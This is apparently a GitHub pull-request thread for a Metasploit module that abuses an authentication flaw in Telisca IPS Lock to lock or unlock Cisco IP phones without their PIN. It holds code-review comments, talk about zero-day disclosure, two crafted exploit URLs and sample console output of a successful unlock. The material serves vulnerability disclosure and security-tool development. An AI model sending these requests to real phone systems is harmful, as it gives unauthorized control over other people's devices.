Add module Telisca IPS Lock/Unlock #6470
Conversation
+ symantec_brightmail_ldapcreds.rb + telisca_ips_lock_abuse.rb
|
I see there are two modules in this pull request, and at first glance they look identical to me. Should there be two modules? |
|
Hi In this pull there is just one module "modules/auxiliary/scanner/voice/telisca_ips_lock_abuse.rb", when i create the branch i removed the other module "remove symantec_brightmail_ldapcreds.rb" |
|
@kfr-ma Ah ok. Well, I see modules/auxiliary/voip/telisca_ips_lock_abuse.rb in this pull request too, so perhaps you want to remove that one as well? |
|
Yes is the same file, the same lines :) |
|
@kfr-ma Ok. On your test_telisca_ipslock branch, please do:
And that should remove the unwanted module, and update the pull request. Thanks! |
|
ah thank you , I could do that tomorrow morning , because I do not have my dev pc with me. |
|
@kfr-ma No problem, take your time :-) |
kfr-ma
force-pushed
the
test_telisca_ipslock
branch
from
6fcac1a to
1b9563b
Compare
…_telisca_ipslock merge
|
Hi wchen-r7, |
|
@kfr-ma yup that looks good now, thanks. BTW, how do I get IPS Lock 2? I am not seeing anything I can download from the vendor's website. |
|
Ah i founded it installed during a pentest for a client , is an Le jeudi 14 janvier 2016, sinn3r [email protected] a écrit :
|
|
@kfr-ma Ok, gotcha. Do you still have access to this box? Will you lose it anytime soon? Because usually what happens is, if we can't verify it, we will have to ask a pcap from you to prove the module is working. But before we do, we will have to review your code and maybe there will be code changes along the way. And obviously, the longer the code review, the more likely you won't be able to test the new changes. So I just would like to know how much time we have to work on this :-) |
|
Hi Le jeudi 14 janvier 2016, sinn3r [email protected] a écrit :
|
|
@kfr-ma Ok cool, thanks! Another question, do you know if this is a zero-day? |
| { | ||
| 'SSL' => false, | ||
| 'SSLVersion' => 'TLS1', | ||
| 'RPORT' => 80 |
There was a problem hiding this comment.
You can remove all these defaults. SSL is false by default and since it is false, we don't need the SSLVersion as well. RPORT is registered by default to 80 in the HTTPClient mixin. Reference is 3752c10
| res = lock(phone_name,ipsserver) | ||
| when 'UNLOCK' | ||
| print_good "Try to unlock " | ||
| res = unlock(phone_name,ipsserver) |
There was a problem hiding this comment.
Since res is not used anywhere, it should be removed.
|
@kfr-ma The indentation is not consistent. You should use two space soft indentation throughout the module. I can see in certain places you have used two space indentation while there are places where a single indentation is used as well. Reference https://github.com/rapid7/metasploit-framework/wiki/Indentation-Standards |
|
Hi Sinn3r , Yes is a zero-day , I just inform the editor today. Regards . 2016-01-14 1:43 GMT+00:00 sinn3r [email protected]:
|
cleaning the code
|
Hi void-in; |
| 'zirsalem' | ||
| ], 'License' => MSF_LICENSE, | ||
| 'License' => MSF_LICENSE, | ||
| 'DisclosureDate' => "Dec 17 2015", |
There was a problem hiding this comment.
What does this date refer to? Is this disclosed to the vendor?
There was a problem hiding this comment.
Hi
This is Date of the vulnerabity discovery , i alerted the editor just today
and he confirm the vulnerability .
Regards.
2016-01-14 17:03 GMT+00:00 Brent Cook [email protected]:
In modules/auxiliary/voip/telisca_ips_lock_abuse.rb
#6470 (comment)
:
- include Msf::Exploit::Remote::HttpClient
- def initialize(info = {})
- super(update_info(info,
'Name' => 'Telisca IPSLock Abuse','Description' => %q{This modules will exploit the vulnerabilities of Telisca IPSLock , in order to lock/unlock IP Phones. you need to be in the voip vlan and you have to know the phone name example : SEP002497AB1D4B . Set ACTION to either LOCK or UNLOCK UNLOCK is the default.},'References' =>[],'Author' =>['Fakhir Karim Reda <karim.fakhir[at]gmail.com>','zirsalem'], 'License' => MSF_LICENSE,'License' => MSF_LICENSE,'DisclosureDate' => "Dec 17 2015",What does this date refer to? Is this disclosed to the vendor?
—
Reply to this email directly or view it on GitHub
https://github.com/rapid7/metasploit-framework/pull/6470/files#r49752816
.
Mainly making sure it is following the Ruby style guide, and avoid unrecommended coding practices.
|
@kfr-ma I have submitted a pull request to update the module, could you please take a look? kfr-ma#2 If the updated module works fine, there should be a green button that says "Merge pull request". That will apply/merge the new code changes to your branch, as well as updating this pull request. Thanks. |
Update Telisca IPS Lock Control module
commit the changes mad by sinn3r and replace headers on lock and unlock
|
This the pcap file which proove that the code work |
|
@kfr-ma Thank you, I got the pcap. I think this module is good to go. However, since this is a zero-day, we will have to delay releasing to master until the vendor has released a patch. Will you please let us know when that happens? Thanks! |
|
ok wchen-r7, |
|
thank you! |
|
A LOT OF YOU GUYS DON'T SEEM TO UNDERSTAND 'THE INTERNET' OR WHAT '0-day' MEANS... |
|
|
|
Barring any complaints from @kfr-ma , this module is good to go. There's no need to wait for a patch. @kfr-ma, is the disclosure date of December 17, 2015 correct? That predates this PR by a few weeks, and conflicts with this comment that indicates disclosure actually happened on January 12, 2016. Just looking for a 👍 on accuracy there. If that's correct, I believe I can land, unless you stop me. I know @wchen-r7 is much more offline this week than usual. |
|
Hi TOD Le mardi 26 janvier 2016, Tod Beardsley [email protected] a écrit :
|
|
Landing this now with some overhauled title and description that more clearly describes the module. |
|
Oh, I took out the |
|
thanks guys, it was a pleasure working with you :) 2016-01-27 22:43 GMT+00:00 Tod Beardsley [email protected]:
|
Telisca IPS Lock (IPS Lock is an XML application for Cisco IP Phones which permits locking
the telephone and preventing any unauthorized calls.
http://www.telisca.com/ips-lock-2/) suffers from vulnerability that allows any
attacker to lock/unlock IP-Phones without knowing the pin code. The attacker
have just to do http request to IPS Lock Server with Mac ADDR of the phone:
For example to lock the IP Phone SEP27745DA145D2 :
http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?action=DO&tg=L&pn=SEP27745DA145D2&dp=&gr=&gl=
For example to unlock the IP Phone SEP27745DA145D2 :
http://IPSLOCKSRV/IPSPCFG/user/Default.aspx?action=U7LCK&pn=SEP88908D68C5D4&dp=
resource (telisco.rb)> use modules/auxiliary/voip/telisca_ips_lock_abuse.rb
resource (telisco.rb)> set PHONENAME SEP27745DA145D2
PHONENAME=> SEPC80084ED0DBD
resource (telisco.rb)> set RHOST 10.16.40.18
RHOST =>10.16.40.18
resource (telisco.rb)> set VHOST 10.16.40.18
VHOST => 10.16.40.18
resource (telisco.rb)> set ACTION UNLOCK
ACTION => UNLOCK
resource(telisco.rb)> run
[+] Try to unlock
[+] Deivice SEP27745DA145D2 successfully unlocked
[*] Auxiliary module execution completed
msf auxiliary(telisca_ips_lock_abuse) >